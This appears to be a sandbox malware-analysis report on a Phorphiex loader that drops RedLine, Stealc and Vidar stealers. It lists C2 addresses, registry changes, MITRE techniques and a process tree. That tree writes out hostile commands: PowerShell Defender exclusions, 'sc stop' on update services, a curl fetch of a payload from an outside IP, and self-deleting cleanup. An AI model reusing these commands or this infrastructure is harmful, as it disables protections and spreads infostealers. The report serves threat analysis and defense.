phorphiex | dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453

Resubmissions

19-07-2024 04:04

240719-enav7avfpa 10

18-07-2024 22:08

240718-12fjgsyfkr 10

Analysis

max time kernel
19s
max time network
73s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
19-07-2024 04:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

12KB
MD5

a14e63d27e1ac1df185fa062103aa9aa
SHA1

2b64c35e4eff4a43ab6928979b6093b95f9fd714
SHA256

dda39f19837168845de33959de34bcfb7ee7f3a29ae55c9fa7f4cb12cb27f453
SHA512

10418efcce2970dcdbef1950464c4001753fccb436f4e8ba5f08f0d4d5c9b4a22a48f2803e59421b720393d84cfabd338497c0bc77cdd4548990930b9c350082
SSDEEP

192:brl2reIazGejA7HhdSbw/z1ULU87glpK/b26J4S1Xu85:b52r+xjALhMWULU870gJJ

Score

10^/10

phorphiex redline stealc vidar 3a901b2c4dd248059af72250cf07aba7 default logsdiller cloud (tg: @logsdillabot)evasion execution infostealer loader persistence stealer trojan worm

Malware Config

Extracted

Family

vidar

Version

10.5

Botnet

3a901b2c4dd248059af72250cf07aba7

https://t.me/s41l0

https://steamcommunity.com/profiles/76561199743486170

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

77.105.135.107:3445

Extracted

Family

stealc

Botnet

default

http://85.28.47.31

Attributes

url_path
/5499d72b3a3e55be.php

Signatures

Detect Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/4760-110-0x0000000000400000-0x0000000000640000-memory.dmp	family_vidar_v7
behavioral2/memory/4760-109-0x0000000000400000-0x0000000000640000-memory.dmp	family_vidar_v7

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Windows Service
T1543.003

Processes:

sysarddrvs.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" sysarddrvs.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	sysarddrvs.exe

Phorphiex payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe	family_phorphiex

Phorphiex, Phorpiex
Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.
worm trojan loader phorphiex
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2948-303-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

sysarddrvs.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysarddrvs.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3728 powershell.exe
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

pid	process
3728	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

sysarddrvs.exeSetup.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation	sysarddrvs.exe
Key value queried	\REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation	Setup.exe

Executes dropped EXE 9 IoCs

Processes:

http185.215.113.66pei.exe.exehttptwizt.netnewtpp.exe.exehttp79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exesysarddrvs.exehttp77.105.132.27djsoftware.exe.exehttp47.128.226.30safe_shell.shc.exe.exe2964131134.exehttp79.137.192.13prog66990947b9f24_crypted.exe#1.exehttp77.105.132.27warsong.exe.exe

pid	process
2716	http185.215.113.66pei.exe.exe
3688	httptwizt.netnewtpp.exe.exe
672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe
4136	sysarddrvs.exe
3292	http77.105.132.27djsoftware.exe.exe
3524	http47.128.226.30safe_shell.shc.exe.exe
2280	2964131134.exe
972	http79.137.192.13prog66990947b9f24_crypted.exe#1.exe
4028	http77.105.132.27warsong.exe.exe

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

sysarddrvs.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	sysarddrvs.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	sysarddrvs.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

httptwizt.netnewtpp.exe.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysarddrvs.exe"	httptwizt.netnewtpp.exe.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exehttp77.105.132.27djsoftware.exe.exehttp77.105.132.27warsong.exe.exe

description	pid	process	target process
PID 672 set thread context of 4760	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 3292 set thread context of 3952	3292	http77.105.132.27djsoftware.exe.exe	MSBuild.exe
PID 4028 set thread context of 4596	4028	http77.105.132.27warsong.exe.exe	MSBuild.exe

Drops file in Windows directory 2 IoCs

Processes:

httptwizt.netnewtpp.exe.exe

description	ioc	process
File opened for modification	C:\Windows\sysarddrvs.exe	httptwizt.netnewtpp.exe.exe
File created	C:\Windows\sysarddrvs.exe	httptwizt.netnewtpp.exe.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

2552 sc.exe
4104 sc.exe
4168 sc.exe
4568 sc.exe
3612 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

952 4596 WerFault.exe MSBuild.exe
940 5088 WerFault.exe MSBuild.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1088 timeout.exe
3380 timeout.exe

pid	process
2552	sc.exe
4104	sc.exe
4168	sc.exe
4568	sc.exe
3612	sc.exe

pid	pid_target	process	target process
952	4596	WerFault.exe	MSBuild.exe
940	5088	WerFault.exe	MSBuild.exe

pid	process
1088	timeout.exe
3380	timeout.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exeMSBuild.exe

pid	process
672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe
672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe
672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe
672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe
672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe
672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe
4760	MSBuild.exe
4760	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

Setup.exehttp79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exehttp77.105.132.27djsoftware.exe.exehttp77.105.132.27warsong.exe.exe

description	pid	process
Token: SeDebugPrivilege	4372	Setup.exe
Token: SeDebugPrivilege	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe
Token: SeDebugPrivilege	3292	http77.105.132.27djsoftware.exe.exe
Token: SeDebugPrivilege	4028	http77.105.132.27warsong.exe.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exehttptwizt.netnewtpp.exe.exehttp79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exehttp77.105.132.27djsoftware.exe.exehttp185.215.113.66pei.exe.exehttp47.128.226.30safe_shell.shc.exe.exesysarddrvs.execmd.exe

description	pid	process	target process
PID 4372 wrote to memory of 2716	4372	Setup.exe	http185.215.113.66pei.exe.exe
PID 4372 wrote to memory of 2716	4372	Setup.exe	http185.215.113.66pei.exe.exe
PID 4372 wrote to memory of 2716	4372	Setup.exe	http185.215.113.66pei.exe.exe
PID 4372 wrote to memory of 3688	4372	Setup.exe	httptwizt.netnewtpp.exe.exe
PID 4372 wrote to memory of 3688	4372	Setup.exe	httptwizt.netnewtpp.exe.exe
PID 4372 wrote to memory of 3688	4372	Setup.exe	httptwizt.netnewtpp.exe.exe
PID 4372 wrote to memory of 672	4372	Setup.exe	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe
PID 4372 wrote to memory of 672	4372	Setup.exe	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe
PID 4372 wrote to memory of 672	4372	Setup.exe	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe
PID 3688 wrote to memory of 4136	3688	httptwizt.netnewtpp.exe.exe	sysarddrvs.exe
PID 3688 wrote to memory of 4136	3688	httptwizt.netnewtpp.exe.exe	sysarddrvs.exe
PID 3688 wrote to memory of 4136	3688	httptwizt.netnewtpp.exe.exe	sysarddrvs.exe
PID 672 wrote to memory of 2420	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 2420	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 2420	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4108	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4108	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4108	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 2616	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 2616	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 2616	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4760	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4760	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4760	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4760	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4760	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4760	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4760	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4760	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4760	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 672 wrote to memory of 4760	672	http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe	MSBuild.exe
PID 4372 wrote to memory of 3292	4372	Setup.exe	http77.105.132.27djsoftware.exe.exe
PID 4372 wrote to memory of 3292	4372	Setup.exe	http77.105.132.27djsoftware.exe.exe
PID 4372 wrote to memory of 3292	4372	Setup.exe	http77.105.132.27djsoftware.exe.exe
PID 4372 wrote to memory of 3524	4372	Setup.exe	http47.128.226.30safe_shell.shc.exe.exe
PID 4372 wrote to memory of 3524	4372	Setup.exe	http47.128.226.30safe_shell.shc.exe.exe
PID 3292 wrote to memory of 3952	3292	http77.105.132.27djsoftware.exe.exe	MSBuild.exe
PID 3292 wrote to memory of 3952	3292	http77.105.132.27djsoftware.exe.exe	MSBuild.exe
PID 3292 wrote to memory of 3952	3292	http77.105.132.27djsoftware.exe.exe	MSBuild.exe
PID 3292 wrote to memory of 3952	3292	http77.105.132.27djsoftware.exe.exe	MSBuild.exe
PID 3292 wrote to memory of 3952	3292	http77.105.132.27djsoftware.exe.exe	MSBuild.exe
PID 3292 wrote to memory of 3952	3292	http77.105.132.27djsoftware.exe.exe	MSBuild.exe
PID 3292 wrote to memory of 3952	3292	http77.105.132.27djsoftware.exe.exe	MSBuild.exe
PID 3292 wrote to memory of 3952	3292	http77.105.132.27djsoftware.exe.exe	MSBuild.exe
PID 3292 wrote to memory of 3952	3292	http77.105.132.27djsoftware.exe.exe	MSBuild.exe
PID 3292 wrote to memory of 3952	3292	http77.105.132.27djsoftware.exe.exe	MSBuild.exe
PID 2716 wrote to memory of 2280	2716	http185.215.113.66pei.exe.exe	2964131134.exe
PID 2716 wrote to memory of 2280	2716	http185.215.113.66pei.exe.exe	2964131134.exe
PID 2716 wrote to memory of 2280	2716	http185.215.113.66pei.exe.exe	2964131134.exe
PID 3524 wrote to memory of 2980	3524	http47.128.226.30safe_shell.shc.exe.exe	cmd.exe
PID 3524 wrote to memory of 2980	3524	http47.128.226.30safe_shell.shc.exe.exe	cmd.exe
PID 4136 wrote to memory of 4544	4136	sysarddrvs.exe	cmd.exe
PID 4136 wrote to memory of 4544	4136	sysarddrvs.exe	cmd.exe
PID 4136 wrote to memory of 4544	4136	sysarddrvs.exe	cmd.exe
PID 4372 wrote to memory of 972	4372	Setup.exe	http79.137.192.13prog66990947b9f24_crypted.exe#1.exe
PID 4372 wrote to memory of 972	4372	Setup.exe	http79.137.192.13prog66990947b9f24_crypted.exe#1.exe
PID 4372 wrote to memory of 972	4372	Setup.exe	http79.137.192.13prog66990947b9f24_crypted.exe#1.exe
PID 2980 wrote to memory of 3808	2980	cmd.exe	curl.exe
PID 2980 wrote to memory of 3808	2980	cmd.exe	curl.exe
PID 4136 wrote to memory of 4984	4136	sysarddrvs.exe	cmd.exe
PID 4136 wrote to memory of 4984	4136	sysarddrvs.exe	cmd.exe
PID 4136 wrote to memory of 4984	4136	sysarddrvs.exe	cmd.exe
PID 4372 wrote to memory of 4028	4372	Setup.exe	http77.105.132.27warsong.exe.exe
PID 4372 wrote to memory of 4028	4372	Setup.exe	http77.105.132.27warsong.exe.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4372
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Users\Admin\AppData\Local\Temp\2964131134.exe
    C:\Users\Admin\AppData\Local\Temp\2964131134.exe
    3⤵
    - Executes dropped EXE
    PID:2280
- C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:3688
- - C:\Windows\sysarddrvs.exe
    C:\Windows\sysarddrvs.exe
    3⤵
    - Modifies security service
    - Windows security bypass
    - Checks computer location settings
    - Executes dropped EXE
    - Windows security modification
    - Suspicious use of WriteProcessMemory
    PID:4136
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
      4⤵
      PID:4544
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3728
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
      4⤵
      PID:4984
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:2552
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:4104
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:4168
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        5⤵
        Launches sc.exe
        
        PID:4568
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        5⤵
        Launches sc.exe
        
        PID:3612
  - - C:\Users\Admin\AppData\Local\Temp\635024184.exe
      C:\Users\Admin\AppData\Local\Temp\635024184.exe
      4⤵
      PID:5080
    - - C:\Windows\winblrsnrcs.exe
        
        C:\Windows\winblrsnrcs.exe
        5⤵
        
        PID:508
  - - C:\Users\Admin\AppData\Local\Temp\3197016522.exe
      C:\Users\Admin\AppData\Local\Temp\3197016522.exe
      4⤵
      PID:4364
- C:\Users\Admin\AppData\Local\Temp\http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe
  "C:\Users\Admin\AppData\Local\Temp\http79.137.192.13prog6698c0ab59e68_aerosoft.exe#mene.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:672
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2420
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4108
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2616
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4760
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGDGIIJJECFI" & exit
      4⤵
      PID:1456
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:3380
- C:\Users\Admin\AppData\Local\Temp\http77.105.132.27djsoftware.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http77.105.132.27djsoftware.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3292
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:3952
  - - C:\ProgramData\AFCBFIJEHD.exe
      "C:\ProgramData\AFCBFIJEHD.exe"
      4⤵
      PID:2856
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:5088
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 1076
        6⤵
        Program crash
        
        PID:940
- C:\Users\Admin\AppData\Local\Temp\http47.128.226.30safe_shell.shc.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http47.128.226.30safe_shell.shc.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl http://47.128.226.30/code.bin
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2980
  - - C:\Windows\system32\curl.exe
      curl http://47.128.226.30/code.bin
      4⤵
      PID:3808
- - C:\Windows\SYSTEM32\cmd.exe
    cmd
    3⤵
    PID:1792
- C:\Users\Admin\AppData\Local\Temp\http79.137.192.13prog66990947b9f24_crypted.exe#1.exe
  "C:\Users\Admin\AppData\Local\Temp\http79.137.192.13prog66990947b9f24_crypted.exe#1.exe"
  2⤵
  - Executes dropped EXE
  PID:972
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2948
- C:\Users\Admin\AppData\Local\Temp\http77.105.132.27warsong.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http77.105.132.27warsong.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:4028
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4596
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 1032
      4⤵
      Program crash
      PID:952
- C:\Users\Admin\AppData\Local\Temp\http77.91.77.80vualtabor.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http77.91.77.80vualtabor.exe.exe"
  2⤵
  PID:4732
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\http77.91.77.80vualtabor.exe.exe" & del "C:\ProgramData\*.dll"" & exit
    3⤵
    PID:1472
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:1088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4596 -ip 4596
1⤵
PID:2824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5088 -ip 5088
1⤵
PID:444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\EGDGIIJJECFI\CBFCFB

Filesize
114KB

MD5
351297ffc92bb38623e9931ff5006c45

SHA1
19206cab50217b6f5926832148000b5bfaba48c6

SHA256
4396c42beb6ecd2c21773c212379dfa63b7a1361bf24e32c5271659609dcd5ef

SHA512
03b950a9a2f4b107163d6847149c5ff2d82f481e92df449f67acbde84cbbdec19a590d2d596cda64a1e3f306334dade38613d55dade5b066137cfd47fcebe116

Download Submit
C:\ProgramData\EGDGIIJJECFI\CGDHDH

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\ProgramData\FIIIIDGHJEBF\AKJDGI

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\ProgramData\FIIIIDGHJEBF\AKJDGI

Filesize
124KB

MD5
9618e15b04a4ddb39ed6c496575f6f95

SHA1
1c28f8750e5555776b3c80b187c5d15a443a7412

SHA256
a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

SHA512
f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

Download Submit
C:\ProgramData\FIIIIDGHJEBF\AKJDGI

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\ProgramData\FIIIIDGHJEBF\JDGCFB

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\ProgramData\FIIIIDGHJEBF\JKJKKK

Filesize
8KB

MD5
d367600364908e947cd912c1a3645812

SHA1
e30fb5646fb10f1b00d018304595bac0be78ee23

SHA256
8a91a7b8c54b036ed870ce151d608b261e9849293714d474839ac41c40812b8a

SHA512
5fea232f8a4bf2a641a3f6e3d240c3875f97482a5e7e97df5edaa839458b43eeffd6be8fa0ec88fefd186c44a8c7fca081cc1b3088e9a60b5392700e5313f680

Download Submit
C:\ProgramData\FIIIIDGHJEBF\KKKJKE

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
